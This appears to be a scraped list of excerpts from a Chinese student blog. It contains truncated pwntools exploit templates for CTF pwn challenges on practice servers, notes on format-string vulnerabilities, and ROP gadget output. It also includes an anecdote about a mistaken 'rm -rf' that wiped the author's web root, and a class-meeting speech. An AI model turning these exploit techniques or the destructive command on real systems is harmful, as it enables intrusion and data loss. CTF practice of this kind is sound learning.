FOR DREAM

exp1234567891011121314151617181920from pwn import *from LibcSearcher import *context( terminal=["wt.exe", "wsl"], os = "linux", #arch ='amd64', arch = "i386", log_level='debug')elf = ELF('./pwn')#io = process('./pwn')#libc = ELF("")io = remote("node4.buuoj.cn",29991)def debug(): gdb.attach(io,'b main') pause()#code here#debug()io.sendline(b'aaaabaaacaaadaaaeaaaf ...

exp简单的ret2text 注意unsignint为-1时可以视为无穷 123456789101112131415161718192021222324from pwn import *from LibcSearcher import *context( terminal=["wt.exe", "wsl"], os = "linux", arch ='amd64', #arch = "i386", log_level='debug')elf = ELF('./pwn')#io = process('./pwn')#libc = ELF("")io = remote("node4.buuoj.cn",26003)def debug(): gdb.attach(io,'b *0x4007c0') pause()#code here# ...

ezpie12345678910111213141516171819202122232425262728293031323334353637from pwn import *from LibcSearcher import *context( terminal=["wt.exe","wsl"], os = "linux", arch = "amd64", #arch = "i386", log_level="debug",)elf = ELF("./pwn")#libc = ELF('./libc-2.31.so')io = process("./pwn")#io = remote("43.249.195.138",22588)def debug(): gdb.attach(io) pause()#debug()offset = 88io.send ...

格式化字符串漏洞 (yuque.com) 函数 基本介绍 printf 输出到 stdout fprintf 输出到指定 FILE 流 vprintf 根据参数列表格式化输出到 stdout vfprintf 根据参数列表格式化输出到指定 FILE 流 sprintf 输出到字符串 snprintf 输出指定字节数到字符串 vsprintf 根据参数列表格式化输出到字符串 vsnprintf 根据参数列表格式化输出指定字节到字符串 setproctitle 设置 argv syslog 输出日志 err, verr, warn, vwarn 等 。。。 %d - 十进制 - 输出十进制整数 %s - 字符串 - 从内存中读取字符串 %x - 十六进制 - 输出十六进制数 %c - 字符 - 输出字符 %p - 指针 - 指针地址 %n - 到目前为止所写的字符数

草今天想搭celesWuff/ktpwarp-server: ktpWarp：课堂派自动签到 (github.com)课堂派自动签到的web 在进行复制粘贴的时候误把cp记成rm进行了以下操作 rm -rf ktpwarp-server /www/wwwroot/结果可想而知 我的网站全G了 首当其冲的是我的blog 正是你现在看的这玩意 由于我没做任何快照(备份的重要性)所以我就开始重新搭blog 搭建过程具体搭建过程可以参考这篇文章[通过Git将Hexo博客部署到服务器 - 知乎 (zhihu.com)](https://zhuanlan.zhihu.com/p/83095214#:~:text=通过Git将Hexo博客部署到服务器 1 使用hexo生成静态文件 2,在云主机上搭建git环境，并将静态文件通过git上传到云主机 3 使用git-hooks实现自动部署 4 Nginx用做静态文件服务器，实现外界对博客的访问) 我这里主要讲我遇到的奇怪问题 1234git init wjuwju.top #新建一个库vim /www/wwwroot/wjuwju.top/.g ...

1234567[*] '/mnt/e/work/pwn/other/vuln/pwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x3ff000) RUNPATH: b'/root/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/' 没有/bin/sh等相关字符串 需要构造 查找一下相关寄存器 ROPgadget --binary pwn --only "pop|ret" 12345678910110x00000000004012dc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret0x00000000004012de : pop r13 ; pop r14 ; pop r15 ; ret0x0 ...

串稿开场明理精工，与时偕行不仅仅是校训，更是我们努力的方向今天，在这条格物致知的道路上，我们将迎来一场别开生面的见面会，遇见我们的引路人。 欢迎各位来到2023级通信1班的班导师见面会 首先让我们以热烈的掌声欢迎我们2023级通信1班的班导师——朱顺痣副校长 大家好，我是23通信1班班长吴家宇，接下来将由我带领大家走进23通信1班 介绍班级 我们23级通信1班共有45位同学 其中女生12名 男生33名 平均年龄18岁。前行路漫漫，万里归来我们仍是少年，永葆18岁的干劲与活力，永远铭记18岁那年我们“明理精工，与时偕行”的初心。接下来向大家介绍我们通信1班的成员 女生宿舍5号楼 (一个个介绍班委和宿舍长)那么我们来自哪里? 从天山之北到到珠江之南，十二个省份，五湖四海的群星汇聚于此凝据成烈火。组成我们通信工程一班友爱大家庭 经过统计 来自福建省的共有29人 其中 来自于漳州市和厦门市的人最多 介绍生活 介绍完班级人员分布情况 就要讲讲开学到现在的欢乐时光 我们把这段时光称为’同行’日记 这个同行分为两种含义: 同行谐音通信 也可以念成同行(hang) 指的是通信1 ...